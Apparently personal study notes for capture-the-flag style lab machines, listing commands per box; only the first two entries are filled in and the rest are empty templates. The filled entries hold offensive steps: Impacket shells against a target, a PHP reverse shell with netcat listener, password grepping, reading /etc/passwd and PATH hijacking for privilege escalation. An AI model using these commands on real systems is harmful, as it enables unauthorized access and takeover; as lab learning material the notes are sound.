tags: SMB SQL
Write-up: archetype_write-up.pdf
System: windows
Tasks:
simple http server:
sudo python3 -m http.server 80
netcat listener:
sudo nc -lvnp 443
DOS show content of file:
c:\more file.txt or c:\type file.txt
automate the enumeration process in the target system
winPEAS
tool mssqlclient.py from the Impacket suite to get a shell to a MS SQL server:
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
tool psexec.py from the Impacket suite to get a shell as the administrator:
python3 psexec.py administrator@{TARGET_IP}
tags: PHP SUID
Write-up: ooopsie_write-up.pdf
System: linux
Tasks:
mapping the website by using Burp Suite proxy
prepare a reverse shell:
php-reverse-shell.php
confirm with gobuster to do directory and page enumeration:
gobuster dir -u http://{TARGET_IP}/ -w wordlists/directory-list-2.3-small.txt -x php
netcat listener:
nc -lvnp 1234
request shell:
http://{Target_IP}/uploads/php-reverse-shell.php
get functional sheel through reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
search for PATTERNS in each FILE and print lines that match the patterns:
cat * | grep -i passw*
cat * : read all files
-i : ignore case sensitive words
check the available users on the system:
cat /etc/passwd
login as a user:
su user
find binary within a group:
find / -group bugtracker 2>/dev/null
add the /tmp directory to the PATH environmental variable:
export PATH=/tmp:$PATH
check $PATH:
echo $PATH
tags: FTP SQL SUID
Write-up: vaccine_write-up.pdf
System: linux
Tasks:
1.
1.
1.
1.
1.
1.
1.
1.
tags: CVE
Write-up:
System: linux
Tasks:
1.
1.
1.
1.
1.
1.
1.
1.
tags: FTP Java PHP LFI
Write-up:
System: linux
Tasks:
1.
1.
1.
1.
1.
1.
1.
1.
tags: XXE
Write-up:
System: windows
Tasks:
1.
1.
1.
1.
1.
1.
1.
1.
tags:
Write-up:
System:
Tasks:
1.
1.
1.
1.
1.
1.
1.
1.